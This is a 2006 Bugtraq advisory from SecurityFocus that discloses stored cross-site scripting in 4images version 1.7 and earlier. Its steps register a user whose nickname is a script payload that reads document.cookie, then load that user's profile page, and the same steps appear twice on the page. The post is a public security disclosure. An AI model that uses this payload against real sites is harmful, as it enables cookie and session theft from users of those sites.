Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
4images <= 1.7 XSS
Apr 20 2006 09:46AM
qex bsdmail org
====================
Discovered by: Qex
Date: 14 April 2006
====================
Steps:-
1- Register with this nickname:-
'><script>alert(document.cookie)</script>
2- Go to http://www.[SITE].com/[PATH]/member.php?action=showprofile&user_id=[ID]
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
Discovered by: Qex
Date: 14 April 2006
====================
Steps:-
1- Register with this nickname:-
'><script>alert(document.cookie)</script>
2- Go to http://www.[SITE].com/[PATH]/member.php?action=showprofile&user_id=[ID]
[ reply ]